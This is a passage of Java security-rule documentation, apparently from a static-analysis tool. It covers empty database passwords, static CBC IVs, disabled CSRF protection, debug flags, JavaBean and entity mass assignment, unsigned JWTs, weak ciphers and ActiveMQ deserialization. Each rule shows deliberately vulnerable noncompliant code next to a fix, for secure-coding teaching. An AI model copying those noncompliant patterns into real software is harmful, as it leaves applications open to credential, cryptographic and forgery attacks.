Possessive quantifiers do not keep backtracking positions and can therefore be used, where possible, to avoid these performance issues:

java.util.regex.Pattern.compile("(a+)++").matcher(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!").matches(); // Compliant

java.util.regex.Pattern.compile("(h|h|ih(((i|a|c|c|a|i|i|j|b|a|i|b|a|a|j))+h)ahbfhba|c|i)*+").matcher(
"hchcchicihcchciiicichhcichcihcchiihichiciiiihhcchi"+
"cchhcihchcihiihciichhccciccichcichiihcchcihhicchcciicchcccihiiihhihihihi"+
"chicihhcciccchihhhcchichchciihiicihciihcccciciccicciiiiiiiiicihhhiiiihchccch"+
"chhhhiiihchihcccchhhiiiiiiiicicichicihcciciihichhhhchihciiihhiccccccciciihh"+
"ichiccchhicchicihihccichicciihcichccihhiciccccccccichhhhihihhcchchihih"+
"iihhihihihicichihiiiihhhhihhhchhichiicihhiiiiihchccccchichci").matches(); // Compliant
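The reason possessive quantifiers avoid these issues is that they never give characters back, so the engine cannot backtrack into them. A minimal illustration of the behavioral difference:

```java
import java.util.regex.Pattern;

public class PossessiveDemo {
    public static void main(String[] args) {
        // Greedy "a*" initially consumes all four 'a's, then backtracks one
        // so the trailing 'a' in the pattern can still match:
        System.out.println(Pattern.matches("a*a", "aaaa"));  // true
        // Possessive "a*+" keeps everything it consumed and never backtracks,
        // so the trailing 'a' in the pattern has nothing left to match:
        System.out.println(Pattern.matches("a*+a", "aaaa")); // false
    }
}
```

This is why a possessive repetition must match exactly what you intend on the first pass; it trades some matching flexibility for a guarantee that no backtracking positions are kept.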

See

java:S2115

Why is this an issue?

When relying on the password authentication mode for the database connection, a secure password should be chosen.

This rule raises an issue when an empty password is used.

Noncompliant code example

Connection conn = DriverManager.getConnection("jdbc:derby:memory:myDB;create=true", "login", "");

Compliant solution

String password = System.getProperty("database.password");
Connection conn = DriverManager.getConnection("jdbc:derby:memory:myDB;create=true", "login", password);
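An empty value read from a system property would silently reintroduce the problem, so it is worth failing fast when the credential is missing. A small sketch of that guard (the helper name and the environment variable name `DATABASE_PASSWORD` are ours):

```java
public class DbPassword {
    // Fail fast when the externally supplied credential is missing, so an
    // empty password can never reach DriverManager.getConnection.
    static String requireNonEmpty(String password) {
        if (password == null || password.isEmpty()) {
            throw new IllegalStateException("database password not configured");
        }
        return password;
    }

    public static void main(String[] args) {
        // In real code the value would come from e.g.
        // System.getenv("DATABASE_PASSWORD") or a secrets manager.
        System.out.println(requireNonEmpty("s3cr3t"));
    }
}
```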

Resources

java:S3329

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In the mode Cipher Block Chaining (CBC), each block is used as cryptographic input for the next block. For this reason, the first block requires an initialization vector (IV), also called a "starting variable" (SV).

If the same IV is used for multiple encryption sessions or messages, each new encryption of the same plaintext input would always produce the same ciphertext output. This may allow an attacker to detect patterns in the ciphertext.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that the encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code and further exploit the system to obtain more information. Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, a company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Java Cryptographic Extension

Code examples

Noncompliant code example

import java.nio.charset.StandardCharsets;
import java.security.NoSuchAlgorithmException;
import java.security.InvalidKeyException;
import java.security.InvalidAlgorithmParameterException;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import javax.crypto.NoSuchPaddingException;

public void encrypt(String key, String plainText) {

    byte[] staticBytes = "7cVgr5cbdCZVw5WY".getBytes(StandardCharsets.UTF_8);

    IvParameterSpec iv    = new IvParameterSpec(staticBytes);
    SecretKeySpec keySpec = new SecretKeySpec(key.getBytes(StandardCharsets.UTF_8), "AES");

    try {
        Cipher cipher = Cipher.getInstance("AES/CBC/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, keySpec, iv); // Noncompliant: static IV

    } catch(NoSuchAlgorithmException|InvalidKeyException|
            NoSuchPaddingException|InvalidAlgorithmParameterException e) {
        // ...
    }
}

Compliant solution

In this example, the code explicitly uses a random number generator that is considered cryptographically strong.

import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.security.NoSuchAlgorithmException;
import java.security.InvalidKeyException;
import java.security.InvalidAlgorithmParameterException;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import javax.crypto.NoSuchPaddingException;

public void encrypt(String key, String plainText) {

    SecureRandom random = new SecureRandom();
    byte[] randomBytes  = new byte[16];
    random.nextBytes(randomBytes);

    IvParameterSpec iv    = new IvParameterSpec(randomBytes);
    SecretKeySpec keySpec = new SecretKeySpec(key.getBytes(StandardCharsets.UTF_8), "AES");

    try {
        Cipher cipher = Cipher.getInstance("AES/CBC/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, keySpec, iv); // Compliant

    } catch(NoSuchAlgorithmException|InvalidKeyException|
            NoSuchPaddingException|InvalidAlgorithmParameterException e) {
        // ...
    }
}

How does this work?

Use unique IVs

To ensure strong security, the initialization vectors for each encryption operation must be unique and random but they do not have to be secret.

In the previous non-compliant example, the problem is not that the IV is hard-coded.
It is that the same IV is used for multiple encryption attempts.
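Because the IV must be unique but not secret, a common pattern is to draw a fresh random IV for every message and prepend it to the ciphertext so the receiver can recover it. A sketch of that pattern, under the assumption of AES-CBC with a 16-byte key (the class and method names are ours):

```java
import java.nio.ByteBuffer;
import java.security.SecureRandom;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class FreshIvEncryption {
    // Generates a fresh 16-byte IV per message and prepends it to the
    // ciphertext. Encrypting the same plaintext twice therefore produces
    // different outputs, defeating pattern detection across messages.
    static byte[] encrypt(byte[] key, byte[] plaintext) throws Exception {
        byte[] iv = new byte[16];
        new SecureRandom().nextBytes(iv);
        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
        cipher.init(Cipher.ENCRYPT_MODE,
                new SecretKeySpec(key, "AES"),
                new IvParameterSpec(iv));
        byte[] ciphertext = cipher.doFinal(plaintext);
        return ByteBuffer.allocate(iv.length + ciphertext.length)
                .put(iv).put(ciphertext).array();
    }
}
```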

Resources

Standards

java:S4502

A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive actions that they did not intend, such as updating their profile or sending a message; more generally, anything that can change the state of the application.

The attacker can trick the user/victim into clicking a link corresponding to the privileged action, or into visiting a malicious website that embeds a hidden web request. Because web browsers automatically include cookies, the actions can be authenticated and sensitive.

Ask Yourself Whether

  • The web application uses cookies to authenticate users.
  • There exist sensitive operations in the web application that can be performed when the user is authenticated.
  • The state or resources of the web application can be modified, for example by HTTP POST or HTTP DELETE requests.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Protection against CSRF attacks is strongly recommended. It should be:
    • activated by default for all unsafe HTTP methods.
    • implemented, for example, with an unguessable CSRF token.
  • Sensitive operations should never be performed with safe HTTP methods such as GET, which are designed to be used only for information retrieval.
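The "unguessable CSRF token" mentioned above is simply a value an attacker cannot predict. A minimal sketch of generating one (the class name is ours; in practice a framework like Spring Security manages this for you):

```java
import java.security.SecureRandom;
import java.util.Base64;

public class CsrfToken {
    // 32 bytes from a cryptographically secure RNG, URL-safe Base64-encoded
    // for embedding in a hidden form field or a custom request header.
    static String newToken() {
        byte[] bytes = new byte[32];
        new SecureRandom().nextBytes(bytes);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }

    public static void main(String[] args) {
        System.out.println(newToken());
    }
}
```

The server stores the token in the user's session, includes it in rendered forms, and rejects any state-changing request whose submitted token does not match.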

Sensitive Code Example

Spring Security provides protection against CSRF attacks by default, but it can be disabled:

@EnableWebSecurity
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {

  @Override
  protected void configure(HttpSecurity http) throws Exception {
    http.csrf().disable(); // Sensitive: csrf protection is entirely disabled
   // or
    http.csrf().ignoringAntMatchers("/route/"); // Sensitive: csrf protection is disabled for specific routes
  }
}

Compliant Solution

Spring Security's CSRF protection is enabled by default; do not disable it:

@EnableWebSecurity
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {

  @Override
  protected void configure(HttpSecurity http) throws Exception {
    // http.csrf().disable(); // Compliant
  }
}

See

java:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers or applications distributed to end users.

Sensitive Code Example

Throwable.printStackTrace(...) prints a Throwable and its stack trace to System.err (by default), which is not easily parseable and can expose sensitive information:

try {
  /* ... */
} catch(Exception e) {
  e.printStackTrace(); // Sensitive
}

The EnableWebSecurity annotation for Spring Framework with debug set to true enables debugging support:

import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;

@Configuration
@EnableWebSecurity(debug = true) // Sensitive
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
  // ...
}

WebView.setWebContentsDebuggingEnabled(true) for Android enables debugging support:

import android.webkit.WebView;

WebView.setWebContentsDebuggingEnabled(true); // Sensitive
WebView.getFactory().getStatics().setWebContentsDebuggingEnabled(true); // Sensitive

Compliant Solution

Loggers should be used (instead of printStackTrace) to print throwables:

try {
  /* ... */
} catch(Exception e) {
  LOGGER.log("context", e);
}

The EnableWebSecurity annotation for Spring Framework with debug set to false disables debugging support:

import org.springframework.context.annotation.Configuration;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;

@Configuration
@EnableWebSecurity(debug = false)
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
  // ...
}

WebView.setWebContentsDebuggingEnabled(false) for Android disables debugging support:

import android.webkit.WebView;

WebView.setWebContentsDebuggingEnabled(false);
WebView.getFactory().getStatics().setWebContentsDebuggingEnabled(false);

See

java:S4512

Setting JavaBean properties is security sensitive. Doing it with untrusted values has led in the past to the following vulnerability:

JavaBeans can have their properties, or nested properties, set by population functions. An attacker can leverage this feature to push malicious data into the JavaBean that can compromise the software's integrity. A typical attack tries to manipulate the ClassLoader and ultimately execute malicious code.

This rule raises an issue when:

  • BeanUtils.populate(…​) or BeanUtilsBean.populate(…​) from Apache Commons BeanUtils are called
  • BeanUtils.setProperty(…​) or BeanUtilsBean.setProperty(…​) from Apache Commons BeanUtils are called
  • org.springframework.beans.BeanWrapper.setPropertyValue(…​) or org.springframework.beans.BeanWrapper.setPropertyValues(…​) from Spring is called

Ask Yourself Whether

  • The new property values might have been tampered with or provided by an untrusted source.
  • Sensitive properties can be modified, for example: class.classLoader.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Sanitize all values used as JavaBean properties.

Don't set any sensitive properties. Keep full control over which properties are set. If the property names are provided by an untrusted source, filter them with an allowlist.

Sensitive Code Example

Company bean = new Company();
Map<String, Object> map = new HashMap<>();
Enumeration<String> names = request.getParameterNames();
while (names.hasMoreElements()) {
    String name = names.nextElement();
    map.put(name, request.getParameterValues(name));
}
BeanUtils.populate(bean, map); // Sensitive: "map" is populated with data coming from user input, here "request.getParameterNames()"
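The sensitive example above copies every request parameter into the map. The allowlist filtering recommended earlier can be sketched as follows (the class and helper names are ours); applying it before `BeanUtils.populate` ensures entries like `class.classLoader` never reach the bean:

```java
import java.util.HashMap;
import java.util.Map;
import java.util.Set;

public class PropertyAllowlist {
    // Keeps only the properties whose names appear on an explicit allowlist.
    // Anything else, including nested paths like "class.classLoader.x",
    // is silently dropped before the bean is populated.
    static Map<String, String[]> filter(Map<String, String[]> params,
                                        Set<String> allowed) {
        Map<String, String[]> safe = new HashMap<>();
        for (Map.Entry<String, String[]> entry : params.entrySet()) {
            if (allowed.contains(entry.getKey())) {
                safe.put(entry.getKey(), entry.getValue());
            }
        }
        return safe;
    }
}
```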

See

java:S4684

Why is this an issue?

On the one hand, Spring MVC automatically binds request parameters to beans declared as arguments of methods annotated with @RequestMapping. Because of this automatic binding feature, it is possible to set unexpected fields on the arguments of @RequestMapping annotated methods.

On the other hand, persistent objects (@Entity or @Document) are linked to the underlying database and updated automatically by a persistence framework, such as Hibernate, JPA or Spring Data MongoDB.

Together, these two facts can enable a malicious attack: if a persistent object is used as an argument of a method annotated with @RequestMapping, a specially crafted user input can change the content of unexpected fields in the database.

For this reason, using @Entity or @Document objects as arguments of methods annotated with @RequestMapping should be avoided.

In addition to @RequestMapping, this rule also considers the annotations introduced in Spring Framework 4.3: @GetMapping, @PostMapping, @PutMapping, @DeleteMapping, @PatchMapping.

Noncompliant code example

import javax.persistence.Entity;

@Entity
public class Wish {
  Long productId;
  Long quantity;
  Client client;
}

@Entity
public class Client {
  String clientId;
  String name;
  String password;
}

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;

@Controller
public class WishListController {

  @PostMapping(path = "/saveForLater")
  public String saveForLater(Wish wish) { // Noncompliant
    session.save(wish);
    return "saved";
  }

  // Same issue with the pre-Spring 4.3 annotation:
  @RequestMapping(path = "/saveForLater2", method = RequestMethod.POST)
  public String saveForLater2(Wish wish) { // Noncompliant
    session.save(wish);
    return "saved";
  }
}

Compliant solution

public class WishDTO {
  Long productId;
  Long quantity;
  Long clientId;
}

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;

@Controller
public class PurchaseOrderController {

  @PostMapping(path = "/saveForLater")
  public String saveForLater(WishDTO wish) {
    Wish persistentWish = new Wish();
    // do the mapping between "wish" and "persistentWish"
    // ...
    session.save(persistentWish);
    return "saved";
  }

  // Equivalent mapping with the pre-Spring 4.3 annotation:
  @RequestMapping(path = "/saveForLater2", method = RequestMethod.POST)
  public String saveForLater2(WishDTO wish) {
    Wish persistentWish = new Wish();
    // do the mapping between "wish" and "persistentWish"
    // ...
    session.save(persistentWish);
    return "saved";
  }
}

Exceptions

No issue is reported when the parameter is annotated with @PathVariable from Spring Framework: since the lookup is done by id, the object cannot be forged on the client side.

Resources

java:S5659

This vulnerability allows forging of JSON Web Tokens to impersonate other users.

Why is this an issue?

JSON Web Tokens (JWTs), a popular method of securely transmitting information between parties as a JSON object, can become a significant security risk when they are not properly signed with a robust cipher algorithm, left unsigned altogether, or if the signature is not verified. This vulnerability class allows malicious actors to craft fraudulent tokens, effectively impersonating user identities. In essence, the integrity of a JWT hinges on the strength and presence of its signature.

What is the potential impact?

When a JSON Web Token is not appropriately signed with a strong cipher algorithm or if the signature is not verified, it becomes a significant threat to data security and the privacy of user identities.

Impersonation of users

JWTs are commonly used to represent user authorization claims. They contain information about the user’s identity, user roles, and access rights. When these tokens are not securely signed, it allows an attacker to forge them. In essence, a weak or missing signature gives an attacker the power to craft a token that could impersonate any user. For instance, they could create a token for an administrator account, gaining access to high-level permissions and sensitive data.

Unauthorized data access

When a JWT is not securely signed, it can be tampered with by an attacker, and the integrity of the data it carries cannot be trusted. An attacker can manipulate the content of the token and grant themselves permissions they should not have, leading to unauthorized data access.

How to fix it in Java JWT

Code examples

The following code contains examples of JWT encoding and decoding without a strong cipher algorithm.

Noncompliant code example

import io.jsonwebtoken.Jwts;

public void encode() {
    Jwts.builder()
        .setSubject(USER_LOGIN)
        .compact(); // Noncompliant
}

import io.jsonwebtoken.Jwts;

public void decode() {
    Jwts.parser()
        .setSigningKey(SECRET_KEY)
        .parse(token)
        .getBody(); // Noncompliant
}

Compliant solution

import io.jsonwebtoken.Jwts;

public void encode() {
    Jwts.builder()
        .setSubject(USER_LOGIN)
        .signWith(SignatureAlgorithm.HS256, SECRET_KEY)
        .compact();
}

When using Jwts.parser(), make sure to call parseClaimsJws instead of parse as it throws exceptions for invalid or missing signatures.

import io.jsonwebtoken.Jwts;

public void decode() {
    Jwts.parser()
        .setSigningKey(SECRET_KEY)
        .parseClaimsJws(token)
        .getBody();
}

How does this work?

Always sign your tokens

The foremost measure to enhance JWT security is to ensure that every JWT you issue is signed. Unsigned tokens are like open books that anyone can tamper with. Signing your JWTs ensures that any alterations to the tokens after they have been issued can be detected. Most JWT libraries support a signing function, and using it is usually as simple as providing a secret key when the token is created.

Choose a strong cipher algorithm

It is not enough to merely sign your tokens. You need to sign them with a strong cipher algorithm. Algorithms like HS256 (HMAC using SHA-256) are considered secure for most purposes. But for an additional layer of security, you could use an algorithm like RS256 (RSA Signature with SHA-256), which uses a private key for signing and a public key for verification. This way, even if someone gains access to the public key, they will not be able to forge tokens.

Verify the signature of your tokens

Resolving a vulnerability concerning the validation of JWT token signatures is mainly about incorporating a critical step into your process: validating the signature every time a token is decoded. Just having a signed token using a secure algorithm is not enough. If you are not validating signatures, they are not serving their purpose.

Every time your application receives a JWT, it needs to decode the token to extract the information contained within. It is during this decoding process that the signature of the JWT should also be checked.
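Conceptually, what the library does for an HS256 token during that decoding step is recompute the HMAC over the signed part and compare it to the received tag. A stdlib sketch of that check, for illustration only (the class and method names are ours; real applications should rely on the JWT library's verifying parse method rather than hand-rolling this):

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class SignatureCheck {
    // Recomputes the HMAC-SHA256 tag over the signed content and compares it
    // to the received tag in constant time (MessageDigest.isEqual), which is
    // essentially what HS256 verification does internally.
    static boolean verify(byte[] key, String signedPart, byte[] receivedTag)
            throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(key, "HmacSHA256"));
        byte[] expected = mac.doFinal(signedPart.getBytes(StandardCharsets.UTF_8));
        return MessageDigest.isEqual(expected, receivedTag);
    }
}
```

If the comparison fails, the token must be rejected; a token whose tag does not match has either been tampered with or was signed with a different key.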

To resolve the issue follow these instructions:

  1. Use framework-specific functions for signature verification: Most programming frameworks that support JWTs provide specific functions to not only decode a token but also validate its signature simultaneously. Make sure to use these functions when handling incoming tokens.
  2. Handle invalid signatures appropriately: If a JWT’s signature does not validate correctly, it means the token is not trustworthy, indicating potential tampering. The action to take on encountering an invalid token should be denying the request carrying it and logging the event for further investigation.
  3. Incorporate signature validation in your tests: When you are writing tests for your application, include tests that check the signature validation functionality. This can help you catch any instances where signature verification might be unintentionally skipped or bypassed.

By following these practices, you can ensure the security of your application’s JWT handling process, making it resistant to attacks that rely on tampering with tokens. Validation of the signature needs to be an integral and non-negotiable part of your token handling process.

Going the extra mile

Securely store your secret keys

Ensure that your secret keys are stored securely. They should not be hard-coded into your application code or checked into your version control system. Instead, consider using environment variables, secure key management systems, or vault services.

Rotate your secret keys

Even with the strongest cipher algorithms, there is a risk that your secret keys may be compromised. Therefore, it is a good practice to periodically rotate your secret keys. By doing so, you limit the amount of time that an attacker can misuse a stolen key. When you rotate keys, be sure to allow a grace period where tokens signed with the old key are still accepted to prevent service disruptions.

Resources

Standards

java:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Java Cryptographic Extension

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

import javax.crypto.Cipher;
import java.security.NoSuchAlgorithmException;
import javax.crypto.NoSuchPaddingException;

public static void main(String[] args) {
    try {
        Cipher des = Cipher.getInstance("DES"); // Noncompliant
    } catch(NoSuchAlgorithmException|NoSuchPaddingException e) {
        // ...
    }
}

Compliant solution

import javax.crypto.Cipher;
import java.security.NoSuchAlgorithmException;
import javax.crypto.NoSuchPaddingException;

public static void main(String[] args) {
    try {
        Cipher aes = Cipher.getInstance("AES/GCM/NoPadding");
    } catch(NoSuchAlgorithmException|NoSuchPaddingException e) {
        // ...
    }
}

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

java:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB (Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

For RSA, the weakest configurations either use no padding at all or use the PKCS#1 v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm, the likelihood that an attacker is able to recover the cleartext increases drastically.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in Java Cryptographic Extension

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

import javax.crypto.Cipher;
import java.security.NoSuchAlgorithmException;
import javax.crypto.NoSuchPaddingException;

public static void main(String[] args) {
    try {
        Cipher.getInstance("AES/CBC/PKCS5Padding"); // Noncompliant
    } catch(NoSuchAlgorithmException|NoSuchPaddingException e) {
        // ...
    }
}

Example with an asymmetric cipher, RSA:

import javax.crypto.Cipher;
import java.security.NoSuchAlgorithmException;
import javax.crypto.NoSuchPaddingException;

public static void main(String[] args) {
    try {
        Cipher.getInstance("RSA/None/NoPadding"); // Noncompliant
    } catch(NoSuchAlgorithmException|NoSuchPaddingException e) {
        // ...
    }
}

Compliant solution

For the AES symmetric cipher, use the GCM mode:

import javax.crypto.Cipher;
import java.security.NoSuchAlgorithmException;
import javax.crypto.NoSuchPaddingException;

public static void main(String[] args) {
    try {
        Cipher.getInstance("AES/GCM/NoPadding");
    } catch(NoSuchAlgorithmException|NoSuchPaddingException e) {
        // ...
    }
}

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

import javax.crypto.Cipher;
import java.security.NoSuchAlgorithmException;
import javax.crypto.NoSuchPaddingException;

public static void main(String[] args) {
    try {
        Cipher.getInstance("RSA/ECB/OAEPWITHSHA-256ANDMGF1PADDING");
    } catch(NoSuchAlgorithmException|NoSuchPaddingException e) {
        // ...
    }
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Carter-Wegman + CTR mode
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integrity Aware Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it is considered more straightforward to use AES-GCM directly instead.
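A complete AES-GCM round trip can be sketched as follows. The class and method names (AesGcmExample, encrypt, decrypt) are illustrative; the random 96-bit IV is prepended to the ciphertext so the receiver can recover it:

```java
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.util.Arrays;

public class AesGcmExample {

    // Encrypts plaintext with AES-GCM; returns IV || ciphertext.
    public static byte[] encrypt(SecretKey key, byte[] plaintext) throws Exception {
        byte[] iv = new byte[12];                          // 96-bit IV, recommended for GCM
        new SecureRandom().nextBytes(iv);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, key, new GCMParameterSpec(128, iv)); // 128-bit auth tag
        byte[] ciphertext = cipher.doFinal(plaintext);
        byte[] out = new byte[iv.length + ciphertext.length];
        System.arraycopy(iv, 0, out, 0, iv.length);
        System.arraycopy(ciphertext, 0, out, iv.length, ciphertext.length);
        return out;
    }

    // Splits off the IV and decrypts; throws AEADBadTagException if the data was tampered with.
    public static byte[] decrypt(SecretKey key, byte[] ivAndCiphertext) throws Exception {
        byte[] iv = Arrays.copyOfRange(ivAndCiphertext, 0, 12);
        byte[] ciphertext = Arrays.copyOfRange(ivAndCiphertext, 12, ivAndCiphertext.length);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.DECRYPT_MODE, key, new GCMParameterSpec(128, iv));
        return cipher.doFinal(ciphertext);
    }

    public static void main(String[] args) throws Exception {
        KeyGenerator keyGen = KeyGenerator.getInstance("AES");
        keyGen.init(128);
        SecretKey key = keyGen.generateKey();
        byte[] encrypted = encrypt(key, "secret message".getBytes(StandardCharsets.UTF_8));
        String decrypted = new String(decrypt(key, encrypted), StandardCharsets.UTF_8);
        System.out.println(decrypted.equals("secret message")); // prints "true"
    }
}
```

Never reuse an IV with the same key in GCM mode; doing so breaks both confidentiality and authenticity.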

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.
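An encrypt/decrypt round trip with RSA-OAEP can be sketched as follows (the class name RsaOaepExample and method names are illustrative):

```java
import javax.crypto.Cipher;
import java.nio.charset.StandardCharsets;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.PublicKey;

public class RsaOaepExample {
    private static final String TRANSFORMATION = "RSA/ECB/OAEPWITHSHA-256ANDMGF1PADDING";

    public static byte[] encrypt(PublicKey publicKey, byte[] plaintext) throws Exception {
        Cipher cipher = Cipher.getInstance(TRANSFORMATION);
        cipher.init(Cipher.ENCRYPT_MODE, publicKey);
        // Plaintext must fit in one block: about 190 bytes for a 2048-bit key with SHA-256 OAEP.
        return cipher.doFinal(plaintext);
    }

    public static byte[] decrypt(PrivateKey privateKey, byte[] ciphertext) throws Exception {
        Cipher cipher = Cipher.getInstance(TRANSFORMATION);
        cipher.init(Cipher.DECRYPT_MODE, privateKey);
        return cipher.doFinal(ciphertext);
    }

    public static void main(String[] args) throws Exception {
        KeyPairGenerator generator = KeyPairGenerator.getInstance("RSA");
        generator.initialize(2048);
        KeyPair keyPair = generator.generateKeyPair();
        byte[] ciphertext = encrypt(keyPair.getPublic(), "secret".getBytes(StandardCharsets.UTF_8));
        System.out.println(new String(decrypt(keyPair.getPrivate(), ciphertext), StandardCharsets.UTF_8)); // prints "secret"
    }
}
```

In practice, RSA-OAEP is usually used to encrypt a symmetric key rather than the message itself, because of the block-size limit noted in the comment.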

Resources

Articles & blog posts

Standards

java:S5301

Why is this an issue?

ActiveMQ can send and receive JMS object messages (called ObjectMessage in the ActiveMQ context) to comply with the JMS specification. Internally, ActiveMQ relies on the Java serialization mechanism to marshal and unmarshal the message payload. Deserialization of data supplied by the user can lead to remote code execution attacks, where the structure of the serialized data is changed to modify the behavior of the object being deserialized.

